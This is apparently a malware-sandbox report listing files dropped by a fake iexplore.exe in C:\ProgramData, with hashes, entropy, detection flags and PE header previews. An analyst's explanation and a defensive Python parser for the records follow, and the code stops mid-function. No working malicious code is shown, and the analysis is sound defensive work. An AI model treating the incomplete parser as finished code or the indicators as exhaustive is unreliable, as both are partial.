                                                                                                                  Size (bytes):23381504
                                                                                                                  Entropy (8bit):6.5878622643446985
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:393216:xImauu+SZNC39wUM9vzz22/OqDOGtNTtfmk4070bcgT2hONn6q+:zaHNC39A9v3RDOGtNTt7zEPNk
                                                                                                                  MD5:4AAEF1456E282E5EF665D65555F47F56
                                                                                                                  SHA1:C2766BAF02B13751AE27A4CAE3C9A9170B3A5A68
                                                                                                                  SHA-256:7543FCB050670136CF1CB50850B35348BFA924299D398E92C1506EC1A665A6AB
                                                                                                                  SHA-512:E2C24273F632D4E51068F7FBD663FCB68C1175EDA666CED3460ECD01ACE7F786EF6F59D9B49042E695AC8F4A519BA6580ED4D3239BB8E589CC18FD7DE2F7AACB
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5440
                                                                                                                  Entropy (8bit):5.151472270533444
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:c9ACTXc/yidAKdpJkKbmFr0Tamlrp8GJGRME0vjV:c3zji+KNbsr03/8xRME0R
                                                                                                                  MD5:8C144A878842AE4A3DC9702B6B09B7BC
                                                                                                                  SHA1:B21914E7F7EAF429597D506A65A23174E5B580E1
                                                                                                                  SHA-256:BB2F1B8438FCE33CF1A0C45C058E0009328E1E83AE2DE9E6EF76CF210D62DA02
                                                                                                                  SHA-512:F17FD8F189C2079ECCE847F0F562318A8736D012B1B0EFD38C7F8DEAA58F4F69577A99205DF4009743C83F7184024511ED7A8F0F2881A82BD476C22B2E0C287A
                                                                                                                  Malicious:false
                                                                                                                  Preview:__all__ = [.. "IntPointer",.. "MatLike",.. "MatShape",.. "Size",.. "Size2f",.. "Scalar",.. "Point",.. "Point2i",.. "Point2f",.. "Point2d",.. "Point3i",.. "Point3f",.. "Point3d",.. "Range",.. "Rect",.. "Rect2i",.. "Rect2d",.. "Moments",.. "RotatedRect",.. "TermCriteria",.. "Vec2i",.. "Vec2f",.. "Vec2d",.. "Vec3i",.. "Vec3f",.. "Vec3d",.. "Vec4i",.. "Vec4f",.. "Vec4d",.. "Vec6f",.. "FeatureDetector",.. "DescriptorExtractor",.. "FeatureExtractor",.. "GProtoArg",.. "GProtoInputArgs",.. "GProtoOutputArgs",.. "GRunArg",.. "GOptRunArg",.. "GMetaArg",.. "Prim",.. "Matx33f",.. "Matx33d",.. "Matx44f",.. "Matx44d",.. "GTypeInfo",.. "ExtractArgsCallback",.. "ExtractMetaCallback",.. "LayerId",.. "IndexParams",.. "SearchParams",.. "map_string_and_string",.. "map_string_and_int",.. "map_string_and_vector_size_t",.. "map_string_and_vector_flo
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):344
                                                                                                                  Entropy (8bit):4.438685267245838
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:1zBhJDyTH2XE2OTH2XRxEMGMBrMhWcROEoiZAIfH2Xc10F9vSumHcROEoiZWf:1zBHyLkOLejrMYccRIfh0FNSfcct
                                                                                                                  MD5:952D77A31C0171AE90C0086AA8E3FCC7
                                                                                                                  SHA1:000D22FD5A2545CEFBBF294D63415E82E232820A
                                                                                                                  SHA-256:2B16990B35B569AF1CA7239DC10F7B24EC62F27A46626B1E2F1271D2E1AA3554
                                                                                                                  SHA-512:36E5BEA12CDF8AE29D737F7062923AE4A1DBDB2C98904F9A35559222119FAFA836C4A7553F5CD9F5639043183155F5E93DFE731EBCF385349A8E4CA72D2E92B6
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:from collections import namedtuple....import cv2......NativeMethodPatchedResult = namedtuple("NativeMethodPatchedResult",.. ("py", "native"))......def testOverwriteNativeMethod(arg):.. return NativeMethodPatchedResult(.. arg + 1,.. cv2.utils._native.testOverwriteNativeMethod(arg).. )..
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):96
                                                                                                                  Entropy (8bit):4.607207460481909
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:K2T2Q4hLCQRi+gI/aIysi+gIgZPGXV:K2Tb4HvgMaDR1CV
                                                                                                                  MD5:5AB6BC30A95A9B2F8CFA07EC4DAA1318
                                                                                                                  SHA1:903F3DC89E8356F2A12393F11E72E8D2C94CF46E
                                                                                                                  SHA-256:F1B385E7D1544D07EA03EA2501322F0E0045582136496C3B1BC44DB9A1221885
                                                                                                                  SHA-512:E50A158868252416264DA31099176826EA897631B8913103C7D7E87D9A02CBD5D749598555B145F689065494BDF9212749BA3D57FC3B756B03F2BA506809E3B4
                                                                                                                  Malicious:false
                                                                                                                  Preview:opencv_version = "4.8.0.76"..contrib = False..headless = False..rolling = False..ci_build = True
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2228256
                                                                                                                  Entropy (8bit):6.104954247326777
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:vqtV0Gvc2Sv/g8pwfBq1CPwDv3uFh+FWg:ytVzvlAg82fBq1CPwDv3uFh+
                                                                                                                  MD5:AAD424A6A0AE6D6E7D4C50A1D96A17FC
                                                                                                                  SHA1:4336017AE32A48315AFE1B10FF14D6159C7923BC
                                                                                                                  SHA-256:3A2DBA6098E77E36A9D20C647349A478CB0149020F909665D209F548DFA71377
                                                                                                                  SHA-512:AA4B74B7971CB774E4AE847A226CAE9D125FADC7CDE4F997B7564DFF4D71B590DCBC06A7103451B72B2AFE3517AB46D3BE099C3620C3D591CCBD1839F0E8F94A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28031158
                                                                                                                  Entropy (8bit):6.117553377153735
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:196608:Y/abffb8noPG9W1c24QlIgcKvO9hPZ/Nr140YC2Z5r4sP55VSNDZN3N3+ef:Y/a7sdQw9hPZQC2JS3N3gef
                                                                                                                  MD5:2C6987A20731CD6EE6B71C66359BBB66
                                                                                                                  SHA1:082AC909DE3F06A92D6E8A0EEE2C66084E85FA84
                                                                                                                  SHA-256:3F5BF77EA9831FB57BB1D663858946EDE0C9155F4CB1D064F20CF3800448026D
                                                                                                                  SHA-512:EEF3CC0A24D926B8688BE591D83B78F1D96BE243E3A0109881E2919034BF00F9504ADE6D165A6105D968612A2D79CF3E05A97BAC2DEF0833048197CEB6D694C9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):537632
                                                                                                                  Entropy (8bit):5.756439581249174
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:BoMMi2+5vtmTnJ0byTZK7AbY5R5yTueRpmJU2lvzn:Bu3+9ID9bYQTDTmJU2lvzn
                                                                                                                  MD5:697766ABA55F44BBD896CBD091A72B55
                                                                                                                  SHA1:D36492BE46EA63CE784E4C1B0103BA21214A76FB
                                                                                                                  SHA-256:44A228B3646EB3575ABD5CBCB079E018DE11CA6B838A29E4391893DE69E0CF4B
                                                                                                                  SHA-512:206957347540F1356D805BF4A2D062927E190481AADC105C3012E69623149850A846503FCA30FC38298F74D7F8F69761FDDD0AA7F5E31FEDB1FA5E5C9DE56E9D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):18944
                                                                                                                  Entropy (8bit):5.9180465336171535
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:xToW2zNhehzYBZkOViAVa6wO3NIS0LyWTrX5n7aO0zVrRJrjU5:xTehgzYBZk+iAVavGITtfXB7S
                                                                                                                  MD5:7162A3F99B83F38FE8FAF66980563F92
                                                                                                                  SHA1:97C74E51F9A53FC6ADD582BD3FD63FA26D4BF070
                                                                                                                  SHA-256:297D6A79FFEB8E304BEAC050D3854AA60F215FA97483FD2AFEEDD93BCBFF6987
                                                                                                                  SHA-512:F7D3B40723EDA1BDC93F7E642E37DB68A55A3B56CF191BD85180B71D58465628AE8B6308FD99542E70787C6208A6EDD3003681526F11DB63EC358F73591AE5FF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):108544
                                                                                                                  Entropy (8bit):6.464571263327524
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:kB1Bpbkt2s6S8HKQMMhndvz7QjxyByK2tmBfKJBuw5Ju1RmERQ9pJs3y:P2vy62tmBfKJQw5oR3R33y
                                                                                                                  MD5:F815462AFC28B8BA914249775A6B5A23
                                                                                                                  SHA1:4BD5A3CFC2A15744058462E50A6D666104337107
                                                                                                                  SHA-256:F43B22DFDFBD766C78C8BC337FBB9EDB1553B510117D618C3005AAF536E9AF12
                                                                                                                  SHA-512:F0D99D629683745A95A322B0003C16B93D524D7F74E462EEED67D80732311BA45F7A6DFD6A380546186C88AC7C8C8864D9FBA0ACAB5E85F78D74DC5206A2FF18
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2299904
                                                                                                                  Entropy (8bit):6.765409673186965
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:u4e2tdleBEZ4Z2EadT5ha6N4qbS6refbVWHdHvVeQ3k9DdZIAqjZa0hWsYlO00e+:/e+eKVe3MGblOSq9tQ47RLXF
                                                                                                                  MD5:915DC7C223A98B234EB9C5AE106BE9EB
                                                                                                                  SHA1:6D2AD35E8C2C7334C99316A0B3C0D77805C9CD05
                                                                                                                  SHA-256:BCA7506498451C7417AF0D94AE916189F256D5F72C708E572C787D3F330AB431
                                                                                                                  SHA-512:CCB629807BCA86A8C0C449A730CBE698908B318A629DF03A81AA8B7E8E4D881DA6805F670A2C22011F9974BCBAF6EDF17EB68B1B1948FE7BF911731348E9F1D2
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hh.I...I...I...@q..]....|..K....{..K.../f..H....|..E....|..C....|..G....W..K....|..J...I........|..M....|.......|..H....|..H....|..H...RichI...........PE..L.....Tb...........!.....L...,......l........`................................$...........@......................... ...l.......,.....#.......................#........................................@............`...............................text....K.......L.................. ..`.rdata..^O...`...P...P..............@..@.data............l..................@....rsrc.........#.......".............@..@.reloc........#.......".............@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):74752
                                                                                                                  Entropy (8bit):6.169335093550956
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:ikXeGYQ6z+pFyj1198Tfgm8DX26HmJRdhxiTjHT1XFdb/5qzKFnBMjkv69Hy0BkJ:xOGP6z+pFyj1Iv8LBHmjdhgXT5bOK5Ba
                                                                                                                  MD5:747E45624F43D16005EAF21CF8B8E732
                                                                                                                  SHA1:4FB1A83E25435F2E408631D29DE01502178AB58D
                                                                                                                  SHA-256:4400D8D3AE53EB785727F4386A967C91641AD9F2A40ECA0D0E147BA6DEC20EA4
                                                                                                                  SHA-512:90C8B01108D433E1760A5C687962F3A3F7B5BD3D314D9B397D6ABEAA868B6062EB5F9436E12DE488E225192F412EAA8AC32FB99F7EC1EEB919BA84DC57F46D99
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2J.3...2..3...2..3...2..3...23.3...2...2...2$.3...2$.3...2$.n2...2$.3...2Rich...2................PE..L.....Tb...........!................N........ ...............................`............@.........................@'..p....'.......@.......................P..$...X#..............................x#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..$....P......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):132608
                                                                                                                  Entropy (8bit):6.417754953007729
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:CBznU7Ogdf7nmJRbRGnX/B1BwZ6e2TbCAQ+pTPolBoSEpAervvaDpTpytT2UurGB:CwnO2zQ+pGjEpAxpyrurGNdeVlSs5k7
                                                                                                                  MD5:F0CBC33387601858844B5A09E8007723
                                                                                                                  SHA1:76685F939F45528C72B3F8534EF6D430BDE44EDA
                                                                                                                  SHA-256:E6192F06B3DFD4E7BB655370A31C9B38279E0596ACBC11C25D948C86738F9B4D
                                                                                                                  SHA-512:3BF7275C4D0D075C0A0B0DB8FC36380A3179352090C9F22EE61D2906960E2D52EFA2C391A2CAFD8506CA16A953CC2F150C4225602C3DC77C4EE80F49145E385E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n}..*...*...*...#d-."...xi..(....n..(...xi..&...xi.. ...xi.."....B..(....i..)...*........i..)....i..+....i..+....iA.+....i..+...Rich*...................PE..L.....Tb...........!.........B...............................................@............@.........................0...d............ .......................0..\.......................................@...............|............................text...d........................... ..`.rdata..............................@..@.data...............................@....rsrc........ ......................@..@.reloc..\....0......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):15360
                                                                                                                  Entropy (8bit):5.697563514183442
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:LSZDvojdioDw+2HPO2oSgwdZAZvmtTkS9Ip2vP:LM2ioP2gRw4ZvIkSO2vP
                                                                                                                  MD5:A22890E1AC499D35C71EA619CCDD3952
                                                                                                                  SHA1:204055E1494D598B3ED4A80553A1947A68E30EE5
                                                                                                                  SHA-256:B13EEA8930BCFB37F148F6796A499F85ED7B90E58574D61239338348325A584F
                                                                                                                  SHA-512:D71FF52CAC6CBCC7C9C125A261B5308CDBAA3B0DB11B39A7D9ED578A37A002B17B935E2FA5E6B4870A980ED9C6D894F72B8118DFC58CCDEB82BF5112CD5E2850
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.nA....................[..............[.......[.......[...........................5...................................Rich............................PE..L.....Tb...........!................N........0...............................p............@..........................5..`...`5..x....P.......................`..8....1..............................01..@............0...............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......,..............@....rsrc........P.......6..............@..@.reloc..8....`.......8..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):233984
                                                                                                                  Entropy (8bit):6.733009520894708
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:LNN3W2hCujNC8MgFy0aWr9ND4U+zqedPxYeWTj5AibYjwTsDASs:LNA24u5CRwy09H8JQhwjwZv
                                                                                                                  MD5:12C576BED9265E9B2066809304175265
                                                                                                                  SHA1:D4A7B4F73E16845EC9FA1D0C4A82EFE456743561
                                                                                                                  SHA-256:E4F4CF6FD794793C16B51FFA9DBCAE6E15EDF71740A588A1FCB385FB9B18BAA1
                                                                                                                  SHA-512:7EDDB7D9044A9DD249CF4A58512ACBE8956F4840BE1ABF24145EAC2DE108C58CCF53A3F4605B8430CE67AF6E7D759BB495ECEEB94EC5793EEF5BDF9661DE00A7
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.r{..!{..!{..!r.`!...!).. y..!... y..!).. w..!).. q..!).. r..!... x..!{..!...!... x..!... z..!... z..!...!z..!... z..!Rich{..!........................PE..L.....Tb...........!................J.....................................................@..........................F.......O..x................................+..8B..............................XB..@............................................text...+........................... ..`.rdata...o.......p..................@..@.data...\)...`.......H..............@....rsrc................d..............@..@.reloc...+.......,...f..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):162816
                                                                                                                  Entropy (8bit):6.512151511996804
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:NO+t01StHo0RqeFshyt2JQkmHQYGJ8DFNJQB3X8wcV3NTLQrEA7Pbnal5MzkfCNf:0GdChyC8NTctPbnAMznf
                                                                                                                  MD5:85DCD3431F6AC186E8EBBD2B6B9FEAF9
                                                                                                                  SHA1:647C56A3F2742419B98D28EEA2788829C914A21A
                                                                                                                  SHA-256:37D30793E220ED8038D00B41FA1F4E157F7B39EEB7201D17A54D0DE8E0A055E3
                                                                                                                  SHA-512:8018CB55A28CDF05902716CDBE235282497A108CF63AD0644C7936885273C7BD3219B6B3045E13889D01B719AC1B6867BFFA2FE1415577217C35FF5EE4AFFC78
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.E.=...=...=...Ex..=...H...=...O...=...H...=...H...=...H...=..sc...=...=..b=..dH...=..dH...=..dH...=..dH...=..Rich.=..........PE..L.....Tb...........!.........~......N........ ............................................@.........................@...X.......d...............................T!..H*..............................h*..@............ ...............................text............................... ..`.rdata....... ... ..................@..@.data...t8...@.......*..............@....rsrc................X..............@..@.reloc..T!......."...Z..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):627200
                                                                                                                  Entropy (8bit):6.476416064151139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:8zQYRHuwvCbtGMBoq8Ro5Qjw90JOhd5heEdvk0SGT:/PbRBoq8Ro5sE00jeE5k8
                                                                                                                  MD5:D0E22EBDADB9FCFD4725C39B88CBE948
                                                                                                                  SHA1:43DA5D14ACF56A6943F2FB8AD16B2771B523CC0C
                                                                                                                  SHA-256:48C9EBF24EB2CDC1385F06C80FA0B72AE9FF70BDBFAE759A65054B773E18BA61
                                                                                                                  SHA-512:040B8C93E94E7C9F92770B1B0873A4DCAEBBE2EE8F569DF0490828C9D129AD589D59608E4270641AB02069335E478FF3377103A0BE334CF84388D91A846223A6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n@~...-...-...-.w.-...-.z/,...-^}/,...-.z+,...-.z*,...-.z-,...-'Q/,...-../-...-0z*,...-0z&,...-0z.,...-0z.-...-0z,,...-Rich...-........PE..L.....Tb...........!.....P...P......:........`............................................@................................h........p...........................R....................................@............`..(............................text....O.......P.................. ..`.rdata..du...`...v...T..............@..@.data............r..................@....rsrc........p.......<..............@..@.reloc...R.......T...>..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):67072
                                                                                                                  Entropy (8bit):6.604714375615078
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:xBRb/nurYzjnK2b5YWNDHuCULaOYWkDoXk8EvhqmddemIobdEm8qLtJHzjZ:vBfuriJb5YWhORY+XxEvYmd8m5ba8N
                                                                                                                  MD5:80094E5CE71D0E1D95D5DACDE37C01D2
                                                                                                                  SHA1:7CD5BBEF324F3878701943B5DD9256EE4EE7362E
                                                                                                                  SHA-256:5EAA43BEA5832386F5716F572D33E4F365E2DAEA16CA9E43F8CC7A3994F5B608
                                                                                                                  SHA-512:E237C3E34386ECF3C03CF7BCF984AD33F76B6B330D40A70E2B7C4408B5E9378903E7C605F8E65B795D1DCD357EBA5D46C320F7001DC39C36D5DA82809E2EF757
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tyH.............m.......`......pg.......`.......`.......`.......K..........8....`.......`.......`.......`......Rich............PE..L.....Tb...........!.........f......N........................................P............@.............................\...\...x....0.......................@..........................................@...............4............................text...}........................... ..`.rdata...".......$..................@..@.data...|0.......,..................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):81408
                                                                                                                  Entropy (8bit):6.577144893100306
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:r8M6QL8vRJfVO6ZbC39IWzz4tkcyGqKr8wsm/piQ9H+KPV:Iy8vRJf8RWWzcGbKr8A9eo
                                                                                                                  MD5:8DF3470A00132C5FCB6BC6C116E80FC6
                                                                                                                  SHA1:50AA20885D4469966F16A01C0A962EFB761E1C1F
                                                                                                                  SHA-256:7A61F88A7D693D85F869AE78A9210D140DE61F675580188FB992106EB4C6E17E
                                                                                                                  SHA-512:9CF3DA43CE994CBEEE0182AE1E6C4D56E5B873C2A718D57F4C3E1FD40EECD13ED566C4C906A75F955513AB466D159E0B0696D01D263937B645990372276C05E3
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN...........................H............................1...............&.......&.......&.......&.......Rich....................PE..L.....Tb...........!.........n......N.....................................................@.............................X...X...d....`.......................p..$...................................(...@............... ............................text...!........................... ..`.rdata..............................@..@.data....B.......>..................@....rsrc........`.......,..............@..@.reloc..$....p......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):59392
                                                                                                                  Entropy (8bit):6.504726786397639
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:SC8W7fIMX0gc3uth9Cp/vUx7xxoqMIyuXgBe:SCRfIMXBs6h9CRKoqMIJgg
                                                                                                                  MD5:1E538508BD3DD2EC1EED553887250C08
                                                                                                                  SHA1:30A0C14D976B54AB0A0C90AEAD2509D7A6766198
                                                                                                                  SHA-256:46660527FA1C8E7FE4E4937905170267A30522889DBC663A658E3D143B801EFA
                                                                                                                  SHA-512:2F239121C0C375670CA2758A1752ACEFFF9A30E355499D88FE0D9BBF28CFCCFB06E8CA379D8C35A4B9C2592D7832E6D8B7E5A877E27C2D8A81BFBC642CD8BB5E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.KS#..S#..S#..Z[o.W#...V..Q#...Q..Q#...V.._#...V..Y#...V..Q#...}..P#..S#...#...V..Q#...V..R#...V..R#...V..R#..RichS#..........PE..L.....Tb...........!.........\......N........................................ ............@.........................@...X.......d...................................X...............................x...@...............,............................text............................... ..`.rdata..............................@..@.data...p5.......0..................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
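Every record in this list uses the same key:value layout, and the hash fields are what ends up in blocklists, so the first thing an analyst does with a report like this is pull the records apart and sanity-check them before sharing indicators. Two points worth keeping in mind while doing so: each file here is flagged Malicious:true by the sandbox while ReversingLabs reports 0% detection, so the verdict rests on behaviour, not on signatures; and the dropping process is an iexplore.exe under C:\ProgramData, whereas the genuine Internet Explorer binary lives under the Program Files directory. The Python below is an added example, not Joe Sandbox code or output. It parses two records copied verbatim from this list, checks hash lengths, emits normalised IOC rows, and computes 8-bit Shannon entropy on constructed byte strings so the scale of the Entropy (8bit) field is visible. The ENCRYPTED_THRESHOLD constant is an illustrative assumption, not the sandbox's documented rule.

```python
"""Parse Joe Sandbox 'Dropped files' records, validate the hashes, and
show how the 'Entropy (8bit)' figure is computed.  Added example; not
part of the report or of Joe Sandbox."""
import math
import re
from collections import Counter

# Constructed sample: two records copied from the report above with the
# indentation removed.  The lossy 'Preview' line is deliberately omitted
# because it is a rendering of bytes, not the bytes themselves.
SAMPLE_REPORT = r"""Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):74752
Entropy (8bit):6.169335093550956
Encrypted:false
SSDEEP:1536:ikXeGYQ6z+pFyj1198Tfgm8DX26HmJRdhxiTjHT1XFdb/5qzKFnBMjkv69Hy0BkJ:xOGP6z+pFyj1Iv8LBHmjdhgXT5bOK5Ba
MD5:747E45624F43D16005EAF21CF8B8E732
SHA1:4FB1A83E25435F2E408631D29DE01502178AB58D
SHA-256:4400D8D3AE53EB785727F4386A967C91641AD9F2A40ECA0D0E147BA6DEC20EA4
SHA-512:90C8B01108D433E1760A5C687962F3A3F7B5BD3D314D9B397D6ABEAA868B6062EB5F9436E12DE488E225192F412EAA8AC32FB99F7EC1EEB919BA84DC57F46D99
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):15360
Entropy (8bit):5.697563514183442
Encrypted:false
SSDEEP:384:LSZDvojdioDw+2HPO2oSgwdZAZvmtTkS9Ip2vP:LM2ioP2gRw4ZvIkSO2vP
MD5:A22890E1AC499D35C71EA619CCDD3952
SHA1:204055E1494D598B3ED4A80553A1947A68E30EE5
SHA-256:B13EEA8930BCFB37F148F6796A499F85ED7B90E58574D61239338348325A584F
SHA-512:D71FF52CAC6CBCC7C9C125A261B5308CDBAA3B0DB11B39A7D9ED578A37A002B17B935E2FA5E6B4870A980ED9C6D894F72B8118DFC58CCDEB82BF5112CD5E2850
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
"""

# Key runs up to the first colon; the value (e.g. a C:\ path) may contain more.
FIELD_RE = re.compile(r"^(?P<key>[^:]+?):(?P<value>.*)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}
ENCRYPTED_THRESHOLD = 7.9  # assumption for illustration, not the sandbox's rule


def parse_dropped_files(text):
    """Return one dict per record.  A record starts at every 'Process:' line,
    which is how the report delimits entries; the bullet lines under the
    empty 'Antivirus:' header are collected into a list."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if current is not None:
                current.setdefault("Antivirus", []).append(line.lstrip("• ").strip())
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
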